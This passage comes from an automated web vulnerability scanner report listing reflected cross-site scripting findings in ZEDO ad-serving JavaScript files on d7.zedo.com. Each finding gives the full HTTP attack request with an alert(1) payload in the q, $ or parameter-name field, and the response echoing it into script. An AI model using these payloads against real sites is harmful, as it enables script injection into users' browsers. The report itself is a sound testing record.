Referer: http://media2.legacy.com/adiframe/3.0/5306.1/1369112/0/-1/size=300x250/adtech;alias=microsite.microsite-2011.lifestoryphotogallery.300x250.2.1;target=_blank;kvpersonid=148615818;kvfhid=1;sub1=Betty;sub2=Garrett;grp=5119389398;misc=4469713464
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ZEDOIDA=INmz6woBADYAAHrQ5V4AAACH~010411; __qca=P0-2130372027-1295906131971; ZEDOIDX=29; FFAbh=766B305,20|320_1#365; ZFFAbh=749B826,20|1643_1#382Z1483_768#365; FFCap=1463B1219,174796:933,196008,151716:305,195657:1211,145132,135220:1063,129348,129351:196636,196635:196641,196640:196643,196640:196645,196644:196641,196640:951,125046,131022,131021:196645,196644:196642,196640:1025,196206,196207,95694|1,24,1:0,40,1:0,40,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,27,1:0,26,1:0,27,1:14,26,1:14,26,1:0,27,1:0,27,1:0,27,1:0,27,1:0,40,1:0,42,3:0,40,1; FFgeo=5386156; PI=h884566Za747317Zc305004506%2C305004506Zs916Zt143; ZCBC=1; FFChanCap=1463B1219,48#878391,19#878390,1#706985#736041#704705,20#878399,16#706985:1083,8#647871,7#740741#668673#648477:1099,2#702971:1174,2#686461,1#735987#661512#735993#661522#663188:1063,1#732560#653259#768798#835748#768794#834936:1194,1#765521#795614,2#758201#684991#758198#677970:951,7#538777#851294#538760#538779#877543#877544,2#776116#653213#562813#711378#776117#775740#864240#580302#653224#649953,11#538792:1190,2#684982,1#751890#675823#675820:1025,1#775786#834321#775734#775797#775796#834305#834300#835846#883311#835844#883313#835850:1120,1#619977|0,1,1:0,1,1:0,1,1:1,1,1:2,1,1:0,11,1:0,11,1:1,6,1:0,12,7:0,7,2:0,6,1:0,17,1:0,24,1:0,25,2:0,24,1:0,25,2:0,24,1:0,24,1:1,24,1:0,25,2:0,24,1:1,24,1:0,24,1:0,24,1:0,24,1:0,24,1:0,25,1:0,25,1:0,25,1:0,25,1:0,26,1:0,26,1:0,26,1:1,26,1:44,26,1:32,26,1:0,26,1:0,27,2:0,26,1:2,26,1:0,26,1:0,26,1:0,26,1:1,26,1:0,27,2:0,26,1:0,27,1:0,36,1:0,38,3:0,36,1:0,36,1:0,40,1:0,41,2:0,40,1:0,40,1:0,40,1:0,41,2:0,41,2:2,40,1:0,40,1:2,40,1:0,40,1:3,40,1:0,42,1; FFcat=305,4506,17:1120,1,9; FFad=0:0

Response

HTTP/1.1 200 OK
Server: ZEDO 3G
Content-Type: application/x-javascript
Set-Cookie: FFChanCap=1463B1219,48#878391,19#878390,1#706985#736041#704705,20#878399,16#706985:1083,8#647871,7#740741#668673#648477:1099,2#702971:1174,2#686461,1#735987#661512#735993#661522#663188:1063,1#732560#653259#768798#835748#768794#834936:1194,1#765521#795614,2#758201#684991#758198#677970:951,7#538777#851294#538760#538779#877543#877544,2#776116#653213#562813#711378#776117#775740#864240#580302#653224#649953,11#538792:1190,2#684982,1#751890#675823#675820:1025,1#775786#834321#775734#775797#775796#834305#834300#835846#883311#835844#883313#835850:1120,1#619977|0,1,1:0,1,1:0,1,1:1,1,1:2,1,1:0,11,1:0,11,1:1,6,1:0,12,7:0,7,2:0,6,1:0,17,1:0,24,1:0,25,2:0,24,1:0,25,2:0,24,1:0,24,1:1,24,1:0,25,2:0,24,1:1,24,1:0,24,1:0,24,1:0,24,1:0,24,1:0,25,1:0,25,1:0,25,1:0,25,1:0,26,1:0,26,1:0,26,1:1,26,1:44,26,1:32,26,1:0,26,1:0,27,2:0,26,1:2,26,1:0,26,1:0,26,1:0,26,1:1,26,1:0,27,2:0,26,1:0,27,1:0,36,1:0,38,3:0,36,1:0,36,1:0,40,1:0,41,2:0,40,1:0,40,1:0,40,1:0,41,2:0,41,2:2,40,1:0,40,1:2,40,1:0,40,1:3,40,1:1,42,1;expires=Wed, 16 Mar 2011 01:29:19 GMT;path=/;domain=.zedo.com;
Set-Cookie: FFcat=1120,1,9:305,4506,17;expires=Mon, 14 Feb 2011 05:00:00 GMT;domain=.zedo.com;path=/;
Set-Cookie: FFad=1:0;expires=Mon, 14 Feb 2011 05:00:00 GMT;domain=.zedo.com;path=/;
ETag: "19b436a-82a5-4989a5927aac0"
Vary: Accept-Encoding
X-Varnish: 2233582065 2233582057
P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml"
Cache-Control: max-age=285
Expires: Mon, 14 Feb 2011 01:34:04 GMT
Date: Mon, 14 Feb 2011 01:29:19 GMT
Connection: close
Content-Length: 2116

// Copyright (c) 2000-2010 ZEDO Inc. All Rights Reserved.

var p9=new Image();

var zzD=window.document;

if(typeof zzuid=='undefined'){
var zzuid='unknown';}
var zzSection=1;var zzPat='cdf1d";alert(1)//afba566bf60';var zzCustom='';
if(typeof zzStr=='undefined'){
var zzStr="q=cdf1d";alert(1)//afba566bf60;z="+Math.random();}

if(zzuid=='unknown')zzuid='INmz6woBADYAAHrQ5V4AAACH~010411';

var zzhasAd=undefined;

var zzStr = "s=1;u=INmz6woBADYAAHrQ5V4A
...[SNIP]...

1.153. http://d7.zedo.com/bar/v16-401/d3/jsc/fm.js [q parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://d7.zedo.com
Path:	/bar/v16-401/d3/jsc/fm.js

Issue detail

The value of the q request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload befbf"%3balert(1)//9c15c465b7a was submitted in the q parameter. This input was echoed as befbf";alert(1)//9c15c465b7a in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /bar/v16-401/d3/jsc/fm.js?c=1&a=0&f=&n=1120&r=13&d=9&q=befbf"%3balert(1)//9c15c465b7a&$=&s=1&z=0.5481068452354521 HTTP/1.1
Host: d7.zedo.com
Proxy-Connection: keep-alive
Referer: http://media2.legacy.com/adiframe/3.0/5306.1/1369112/0/-1/size=300x250/adtech;alias=legacy.legacy.home.300x250.2.1;target=_blank;grp=1473244827;misc=2328660423
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ZEDOIDA=INmz6woBADYAAHrQ5V4AAACH~010411; __qca=P0-2130372027-1295906131971; ZEDOIDX=29; FFAbh=766B305,20|320_1#365; ZFFAbh=749B826,20|1643_1#382Z1483_768#365; FFCap=1463B1219,174796:933,196008,151716:305,195657:1211,145132,135220:1063,129348,129351:196636,196635:196641,196640:196643,196640:196645,196644:196641,196640:951,125046,131022,131021:196645,196644:196642,196640:1025,196206,196207,95694|1,24,1:0,40,1:0,40,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,27,1:0,26,1:0,27,1:14,26,1:14,26,1:0,27,1:0,27,1:0,27,1:0,27,1:0,40,1:0,42,3:0,40,1; FFChanCap=1463B1219,48#878391,19#878390,1#706985#736041#704705,20#878399,16#706985:1083,8#647871,7#740741#668673#648477:1099,2#702971:1174,2#686461,1#735987#661512#735993#661522#663188:1063,1#732560#653259#768798#835748#768794#834936:1194,1#765521#795614,2#758201#684991#758198#677970:951,7#538777#851294#538760#538779#877543#877544,2#776116#653213#562813#711378#776117#775740#864240#580302#653224#649953,11#538792:1190,2#684982,1#751890#675823#675820:1025,1#775786#834321#775734#775797#775796#834305#834300#835846#883311#835844#883313#835850:1120,1#619977|0,1,1:0,1,1:0,1,1:1,1,1:2,1,1:0,11,1:0,11,1:1,6,1:0,12,7:0,7,2:0,6,1:0,17,1:0,24,1:0,25,2:0,24,1:0,25,2:0,24,1:0,24,1:1,24,1:0,25,2:0,24,1:1,24,1:0,24,1:0,24,1:0,24,1:0,24,1:0,25,1:0,25,1:0,25,1:0,25,1:0,26,1:0,26,1:0,26,1:1,26,1:44,26,1:32,26,1:0,26,1:0,27,2:0,26,1:2,26,1:0,26,1:0,26,1:0,26,1:1,26,1:0,27,2:0,26,1:0,27,1:0,36,1:0,38,3:0,36,1:0,36,1:0,40,1:0,41,2:0,40,1:0,40,1:0,40,1:0,41,2:0,41,2:2,40,1:0,40,1:2,40,1:0,40,1:3,40,1:0,41,1; FFgeo=5386156; PI=h884566Za747317Zc305004506%2C305004506Zs916Zt143

Response (redirected)

HTTP/1.1 200 OK
Server: ZEDO 3G
Content-Type: application/x-javascript
Set-Cookie: FFad=0;expires=Mon, 14 Feb 2011 05:00:00 GMT;domain=.zedo.com;path=/;
Set-Cookie: FFcat=1120,1,9;expires=Mon, 14 Feb 2011 05:00:00 GMT;domain=.zedo.com;path=/;
ETag: "812b9fe7-809a-4989a59833840"
Vary: Accept-Encoding
X-Varnish: 2233582316
P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml"
Cache-Control: max-age=62
Expires: Mon, 14 Feb 2011 01:15:59 GMT
Date: Mon, 14 Feb 2011 01:14:57 GMT
Connection: close
Content-Length: 2066

// Copyright (c) 2000-2010 ZEDO Inc. All Rights Reserved.

var p9=new Image();

var zzD=window.document;

if(typeof zzuid=='undefined'){
var zzuid='unknown';}
var zzSection=1;var zzPat='befbf";alert(1)//9c15c465b7a';var zzCustom='';
if(typeof zzStr=='undefined'){
var zzStr="q=befbf";alert(1)//9c15c465b7a;z="+Math.random();}

if(zzuid=='unknown')zzuid='INmz6woBADYAAHrQ5V4AAACH~010411';

var zzhasAd=undefined;

...[SNIP]...

1.154. http://d7.zedo.com/bar/v16-401/d3/jsc/fm.js [q parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://d7.zedo.com
Path:	/bar/v16-401/d3/jsc/fm.js

Issue detail

The value of the q request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 12402'%3balert(1)//5f92dac5487 was submitted in the q parameter. This input was echoed as 12402';alert(1)//5f92dac5487 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /bar/v16-401/d3/jsc/fm.js?c=1&a=0&f=&n=1120&r=13&d=9&q=12402'%3balert(1)//5f92dac5487&$=&s=1&z=0.5481068452354521 HTTP/1.1
Host: d7.zedo.com
Proxy-Connection: keep-alive
Referer: http://media2.legacy.com/adiframe/3.0/5306.1/1369112/0/-1/size=300x250/adtech;alias=legacy.legacy.home.300x250.2.1;target=_blank;grp=1473244827;misc=2328660423
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ZEDOIDA=INmz6woBADYAAHrQ5V4AAACH~010411; __qca=P0-2130372027-1295906131971; ZEDOIDX=29; FFAbh=766B305,20|320_1#365; ZFFAbh=749B826,20|1643_1#382Z1483_768#365; FFCap=1463B1219,174796:933,196008,151716:305,195657:1211,145132,135220:1063,129348,129351:196636,196635:196641,196640:196643,196640:196645,196644:196641,196640:951,125046,131022,131021:196645,196644:196642,196640:1025,196206,196207,95694|1,24,1:0,40,1:0,40,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,27,1:0,26,1:0,27,1:14,26,1:14,26,1:0,27,1:0,27,1:0,27,1:0,27,1:0,40,1:0,42,3:0,40,1; FFChanCap=1463B1219,48#878391,19#878390,1#706985#736041#704705,20#878399,16#706985:1083,8#647871,7#740741#668673#648477:1099,2#702971:1174,2#686461,1#735987#661512#735993#661522#663188:1063,1#732560#653259#768798#835748#768794#834936:1194,1#765521#795614,2#758201#684991#758198#677970:951,7#538777#851294#538760#538779#877543#877544,2#776116#653213#562813#711378#776117#775740#864240#580302#653224#649953,11#538792:1190,2#684982,1#751890#675823#675820:1025,1#775786#834321#775734#775797#775796#834305#834300#835846#883311#835844#883313#835850:1120,1#619977|0,1,1:0,1,1:0,1,1:1,1,1:2,1,1:0,11,1:0,11,1:1,6,1:0,12,7:0,7,2:0,6,1:0,17,1:0,24,1:0,25,2:0,24,1:0,25,2:0,24,1:0,24,1:1,24,1:0,25,2:0,24,1:1,24,1:0,24,1:0,24,1:0,24,1:0,24,1:0,25,1:0,25,1:0,25,1:0,25,1:0,26,1:0,26,1:0,26,1:1,26,1:44,26,1:32,26,1:0,26,1:0,27,2:0,26,1:2,26,1:0,26,1:0,26,1:0,26,1:1,26,1:0,27,2:0,26,1:0,27,1:0,36,1:0,38,3:0,36,1:0,36,1:0,40,1:0,41,2:0,40,1:0,40,1:0,40,1:0,41,2:0,41,2:2,40,1:0,40,1:2,40,1:0,40,1:3,40,1:0,41,1; FFgeo=5386156; PI=h884566Za747317Zc305004506%2C305004506Zs916Zt143

Response (redirected)

HTTP/1.1 200 OK
Server: ZEDO 3G
Content-Type: application/x-javascript
Set-Cookie: FFChanCap=1504B1120,1#886265|0,1,1;expires=Wed, 16 Mar 2011 01:14:58 GMT;path=/;domain=.zedo.com;
Set-Cookie: FFcat=1120,1,9;expires=Mon, 14 Feb 2011 05:00:00 GMT;domain=.zedo.com;path=/;
Set-Cookie: FFad=0;expires=Mon, 14 Feb 2011 05:00:00 GMT;domain=.zedo.com;path=/;
ETag: "812b9fe7-809a-4989a59833840"
Vary: Accept-Encoding
X-Varnish: 2233582316
P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml"
Cache-Control: max-age=61
Expires: Mon, 14 Feb 2011 01:15:59 GMT
Date: Mon, 14 Feb 2011 01:14:58 GMT
Connection: close
Content-Length: 1925

// Copyright (c) 2000-2010 ZEDO Inc. All Rights Reserved.

var p9=new Image();

var zzD=window.document;

if(typeof zzuid=='undefined'){
var zzuid='unknown';}
var zzSection=1;var zzPat='12402';alert(1)//5f92dac5487';var zzCustom='';
if(typeof zzStr=='undefined'){
var zzStr="q=12402';alert(1)//5f92dac5487;z="+Math.random();}

if(zzuid=='unknown')zzuid='INmz6woBADYAAHrQ5V4AAACH~010411';

var zzhasAd=undefined;

...[SNIP]...

1.155. http://d7.zedo.com/bar/v16-401/d3/jsc/fmr.js [$ parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://d7.zedo.com
Path:	/bar/v16-401/d3/jsc/fmr.js

Issue detail

The value of the $ request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload bef81'%3balert(1)//7636571d18a was submitted in the $ parameter. This input was echoed as bef81';alert(1)//7636571d18a in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /bar/v16-401/d3/jsc/fmr.js?c=1&a=0&f=&n=1120&r=13&d=9&q=&$=bef81'%3balert(1)//7636571d18a&s=1&z=0.5481068452354521 HTTP/1.1
Host: d7.zedo.com
Proxy-Connection: keep-alive
Referer: http://media2.legacy.com/adiframe/3.0/5306.1/1369112/0/-1/size=300x250/adtech;alias=legacy.legacy.home.300x250.2.1;target=_blank;grp=1473244827;misc=2328660423
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ZEDOIDA=INmz6woBADYAAHrQ5V4AAACH~010411; __qca=P0-2130372027-1295906131971; ZEDOIDX=29; FFAbh=766B305,20|320_1#365; ZFFAbh=749B826,20|1643_1#382Z1483_768#365; FFCap=1463B1219,174796:933,196008,151716:305,195657:1211,145132,135220:1063,129348,129351:196636,196635:196641,196640:196643,196640:196645,196644:196641,196640:951,125046,131022,131021:196645,196644:196642,196640:1025,196206,196207,95694|1,24,1:0,40,1:0,40,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,27,1:0,26,1:0,27,1:14,26,1:14,26,1:0,27,1:0,27,1:0,27,1:0,27,1:0,40,1:0,42,3:0,40,1; FFChanCap=1463B1219,48#878391,19#878390,1#706985#736041#704705,20#878399,16#706985:1083,8#647871,7#740741#668673#648477:1099,2#702971:1174,2#686461,1#735987#661512#735993#661522#663188:1063,1#732560#653259#768798#835748#768794#834936:1194,1#765521#795614,2#758201#684991#758198#677970:951,7#538777#851294#538760#538779#877543#877544,2#776116#653213#562813#711378#776117#775740#864240#580302#653224#649953,11#538792:1190,2#684982,1#751890#675823#675820:1025,1#775786#834321#775734#775797#775796#834305#834300#835846#883311#835844#883313#835850:1120,1#619977|0,1,1:0,1,1:0,1,1:1,1,1:2,1,1:0,11,1:0,11,1:1,6,1:0,12,7:0,7,2:0,6,1:0,17,1:0,24,1:0,25,2:0,24,1:0,25,2:0,24,1:0,24,1:1,24,1:0,25,2:0,24,1:1,24,1:0,24,1:0,24,1:0,24,1:0,24,1:0,25,1:0,25,1:0,25,1:0,25,1:0,26,1:0,26,1:0,26,1:1,26,1:44,26,1:32,26,1:0,26,1:0,27,2:0,26,1:2,26,1:0,26,1:0,26,1:0,26,1:1,26,1:0,27,2:0,26,1:0,27,1:0,36,1:0,38,3:0,36,1:0,36,1:0,40,1:0,41,2:0,40,1:0,40,1:0,40,1:0,41,2:0,41,2:2,40,1:0,40,1:2,40,1:0,40,1:3,40,1:0,41,1; FFgeo=5386156; PI=h884566Za747317Zc305004506%2C305004506Zs916Zt143; ZCBC=1

Response

HTTP/1.1 200 OK
Server: ZEDO 3G
Content-Type: application/x-javascript
Set-Cookie: FFpb=1120:bef81';alert(1)//7636571d18a;expires=Mon, 14 Feb 2011 05:00:00 GMT;domain=.zedo.com;path=/;
Set-Cookie: FFcat=1120,1,9;expires=Mon, 14 Feb 2011 05:00:00 GMT;domain=.zedo.com;path=/;
Set-Cookie: FFad=0;expires=Mon, 14 Feb 2011 05:00:00 GMT;domain=.zedo.com;path=/;
Set-Cookie: FFChanCap=1463B1219,48#878391,19#878390,1#706985#736041#704705,20#878399,16#706985:1083,8#647871,7#740741#668673#648477:1099,2#702971:1174,2#686461,1#735987#661512#735993#661522#663188:1063,1#732560#653259#768798#835748#768794#834936:1194,1#765521#795614,2#758201#684991#758198#677970:951,7#538777#851294#538760#538779#877543#877544,2#776116#653213#562813#711378#776117#775740#864240#580302#653224#649953,11#538792:1190,2#684982,1#751890#675823#675820:1025,1#775786#834321#775734#775797#775796#834305#834300#835846#883311#835844#883313#835850:1120,1#619977|0,1,1:0,1,1:0,1,1:1,1,1:2,1,1:0,11,1:0,11,1:1,6,1:0,12,7:0,7,2:0,6,1:0,17,1:0,24,1:0,25,2:0,24,1:0,25,2:0,24,1:0,24,1:1,24,1:0,25,2:0,24,1:1,24,1:0,24,1:0,24,1:0,24,1:0,24,1:0,25,1:0,25,1:0,25,1:0,25,1:0,26,1:0,26,1:0,26,1:1,26,1:44,26,1:32,26,1:0,26,1:0,27,2:0,26,1:2,26,1:0,26,1:0,26,1:0,26,1:1,26,1:0,27,2:0,26,1:0,27,1:0,36,1:0,38,3:0,36,1:0,36,1:0,40,1:0,41,2:0,40,1:0,40,1:0,40,1:0,41,2:0,41,2:2,40,1:0,40,1:2,40,1:0,40,1:3,40,1:0,42,1;expires=Wed, 16 Mar 2011 01:15:00 GMT;path=/;domain=.zedo.com;
ETag: "812b9fe7-809a-4989a59833840"
Vary: Accept-Encoding
X-Varnish: 2233582316
P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml"
Cache-Control: max-age=60
Expires: Mon, 14 Feb 2011 01:16:00 GMT
Date: Mon, 14 Feb 2011 01:15:00 GMT
Connection: close
Content-Length: 2119

// Copyright (c) 2000-2010 ZEDO Inc. All Rights Reserved.

var p9=new Image();

var zzD=window.document;

if(typeof zzuid=='undefined'){
var zzuid='unknown';}
var zzSection=1;var zzPat=',bef81';alert(1)//7636571d18a';var zzCustom='';
if(typeof zzStr=='undefined'){
var zzStr="q=,bef81';alert(1)//7636571d18a;z="+Math.random();}

if(zzuid=='unknown')zzuid='INmz6woBADYAAHrQ5V4AAACH~010411';

var zzhasAd=undefined;

...[SNIP]...

1.156. http://d7.zedo.com/bar/v16-401/d3/jsc/fmr.js [$ parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://d7.zedo.com
Path:	/bar/v16-401/d3/jsc/fmr.js

Issue detail

The value of the $ request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 20c48"%3balert(1)//9211c166c4e was submitted in the $ parameter. This input was echoed as 20c48";alert(1)//9211c166c4e in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /bar/v16-401/d3/jsc/fmr.js?c=1&a=0&f=&n=1120&r=13&d=9&q=&$=20c48"%3balert(1)//9211c166c4e&s=1&z=0.5481068452354521 HTTP/1.1
Host: d7.zedo.com
Proxy-Connection: keep-alive
Referer: http://media2.legacy.com/adiframe/3.0/5306.1/1369112/0/-1/size=300x250/adtech;alias=legacy.legacy.home.300x250.2.1;target=_blank;grp=1473244827;misc=2328660423
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ZEDOIDA=INmz6woBADYAAHrQ5V4AAACH~010411; __qca=P0-2130372027-1295906131971; ZEDOIDX=29; FFAbh=766B305,20|320_1#365; ZFFAbh=749B826,20|1643_1#382Z1483_768#365; FFCap=1463B1219,174796:933,196008,151716:305,195657:1211,145132,135220:1063,129348,129351:196636,196635:196641,196640:196643,196640:196645,196644:196641,196640:951,125046,131022,131021:196645,196644:196642,196640:1025,196206,196207,95694|1,24,1:0,40,1:0,40,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,27,1:0,26,1:0,27,1:14,26,1:14,26,1:0,27,1:0,27,1:0,27,1:0,27,1:0,40,1:0,42,3:0,40,1; FFChanCap=1463B1219,48#878391,19#878390,1#706985#736041#704705,20#878399,16#706985:1083,8#647871,7#740741#668673#648477:1099,2#702971:1174,2#686461,1#735987#661512#735993#661522#663188:1063,1#732560#653259#768798#835748#768794#834936:1194,1#765521#795614,2#758201#684991#758198#677970:951,7#538777#851294#538760#538779#877543#877544,2#776116#653213#562813#711378#776117#775740#864240#580302#653224#649953,11#538792:1190,2#684982,1#751890#675823#675820:1025,1#775786#834321#775734#775797#775796#834305#834300#835846#883311#835844#883313#835850:1120,1#619977|0,1,1:0,1,1:0,1,1:1,1,1:2,1,1:0,11,1:0,11,1:1,6,1:0,12,7:0,7,2:0,6,1:0,17,1:0,24,1:0,25,2:0,24,1:0,25,2:0,24,1:0,24,1:1,24,1:0,25,2:0,24,1:1,24,1:0,24,1:0,24,1:0,24,1:0,24,1:0,25,1:0,25,1:0,25,1:0,25,1:0,26,1:0,26,1:0,26,1:1,26,1:44,26,1:32,26,1:0,26,1:0,27,2:0,26,1:2,26,1:0,26,1:0,26,1:0,26,1:1,26,1:0,27,2:0,26,1:0,27,1:0,36,1:0,38,3:0,36,1:0,36,1:0,40,1:0,41,2:0,40,1:0,40,1:0,40,1:0,41,2:0,41,2:2,40,1:0,40,1:2,40,1:0,40,1:3,40,1:0,41,1; FFgeo=5386156; PI=h884566Za747317Zc305004506%2C305004506Zs916Zt143; ZCBC=1

Response

HTTP/1.1 200 OK
Server: ZEDO 3G
Content-Type: application/x-javascript
Set-Cookie: FFpb=1120:20c48";alert(1)//9211c166c4e;expires=Mon, 14 Feb 2011 05:00:00 GMT;domain=.zedo.com;path=/;
Set-Cookie: FFcat=1120,1,9;expires=Mon, 14 Feb 2011 05:00:00 GMT;domain=.zedo.com;path=/;
Set-Cookie: FFad=0;expires=Mon, 14 Feb 2011 05:00:00 GMT;domain=.zedo.com;path=/;
Set-Cookie: FFChanCap=1463B1219,48#878391,19#878390,1#706985#736041#704705,20#878399,16#706985:1083,8#647871,7#740741#668673#648477:1099,2#702971:1174,2#686461,1#735987#661512#735993#661522#663188:1063,1#732560#653259#768798#835748#768794#834936:1194,1#765521#795614,2#758201#684991#758198#677970:951,7#538777#851294#538760#538779#877543#877544,2#776116#653213#562813#711378#776117#775740#864240#580302#653224#649953,11#538792:1190,2#684982,1#751890#675823#675820:1025,1#775786#834321#775734#775797#775796#834305#834300#835846#883311#835844#883313#835850:1120,1#619977|0,1,1:0,1,1:0,1,1:1,1,1:2,1,1:0,11,1:0,11,1:1,6,1:0,12,7:0,7,2:0,6,1:0,17,1:0,24,1:0,25,2:0,24,1:0,25,2:0,24,1:0,24,1:1,24,1:0,25,2:0,24,1:1,24,1:0,24,1:0,24,1:0,24,1:0,24,1:0,25,1:0,25,1:0,25,1:0,25,1:0,26,1:0,26,1:0,26,1:1,26,1:44,26,1:32,26,1:0,26,1:0,27,2:0,26,1:2,26,1:0,26,1:0,26,1:0,26,1:1,26,1:0,27,2:0,26,1:0,27,1:0,36,1:0,38,3:0,36,1:0,36,1:0,40,1:0,41,2:0,40,1:0,40,1:0,40,1:0,41,2:0,41,2:2,40,1:0,40,1:2,40,1:0,40,1:3,40,1:0,42,1;expires=Wed, 16 Mar 2011 01:14:59 GMT;path=/;domain=.zedo.com;
ETag: "812b9fe7-809a-4989a59833840"
Vary: Accept-Encoding
X-Varnish: 2233582316
P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml"
Cache-Control: max-age=60
Expires: Mon, 14 Feb 2011 01:15:59 GMT
Date: Mon, 14 Feb 2011 01:14:59 GMT
Connection: close
Content-Length: 2119

// Copyright (c) 2000-2010 ZEDO Inc. All Rights Reserved.

var p9=new Image();

var zzD=window.document;

if(typeof zzuid=='undefined'){
var zzuid='unknown';}
var zzSection=1;var zzPat=',20c48";alert(1)//9211c166c4e';var zzCustom='';
if(typeof zzStr=='undefined'){
var zzStr="q=,20c48";alert(1)//9211c166c4e;z="+Math.random();}

if(zzuid=='unknown')zzuid='INmz6woBADYAAHrQ5V4AAACH~010411';

var zzhasAd=undefined;

var zzStr = "s=1;u=INmz6woBADYAAHrQ5V4A
...[SNIP]...

1.157. http://d7.zedo.com/bar/v16-401/d3/jsc/fmr.js [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://d7.zedo.com
Path:	/bar/v16-401/d3/jsc/fmr.js

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 79b5f'-alert(1)-'606f1eb024 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /bar/v16-401/d3/jsc/fmr.js?79b5f'-alert(1)-'606f1eb024=1 HTTP/1.1
Host: d7.zedo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ZEDOIDA=INmz6woBADYAAHrQ5V4AAACH~010411; FFgeo=5386156; ZCBC=1; ZEDOIDX=29; PI=h884566Za747317Zc305004506%2C305004506Zs916Zt143; FFChanCap=1463B1219,48#878391,19#878390,1#706985#736041#704705,20#878399,16#706985:1083,8#647871,7#740741#668673#648477:1099,2#702971:1174,2#686461,1#735987#661512#735993#661522#663188:1063,1#732560#653259#768798#835748#768794#834936:1194,1#765521#795614,2#758201#684991#758198#677970:951,7#538777#851294#538760#538779#877543#877544,2#776116#653213#562813#711378#776117#775740#864240#580302#653224#649953,11#538792:1190,2#684982,1#751890#675823#675820:1025,1#775786#834321#775734#775797#775796#834305#834300#835846#883311#835844#883313#835850:1120,1#619977|0,1,1:0,1,1:0,1,1:1,1,1:2,1,1:0,11,1:0,11,1:1,6,1:0,12,7:0,7,2:0,6,1:0,17,1:0,24,1:0,25,2:0,24,1:0,25,2:0,24,1:0,24,1:1,24,1:0,25,2:0,24,1:1,24,1:0,24,1:0,24,1:0,24,1:0,24,1:0,25,1:0,25,1:0,25,1:0,25,1:0,26,1:0,26,1:0,26,1:1,26,1:44,26,1:32,26,1:0,26,1:0,27,2:0,26,1:2,26,1:0,26,1:0,26,1:0,26,1:1,26,1:0,27,2:0,26,1:0,27,1:0,36,1:0,38,3:0,36,1:0,36,1:0,40,1:0,41,2:0,40,1:0,40,1:0,40,1:0,41,2:0,41,2:2,40,1:0,40,1:2,40,1:0,40,1:3,40,1:0,42,1; FFcat=1120,1,9; ZFFAbh=749B826,20|1643_1#382Z1483_768#365; FFAbh=766B305,20|320_1#365; FFad=0; 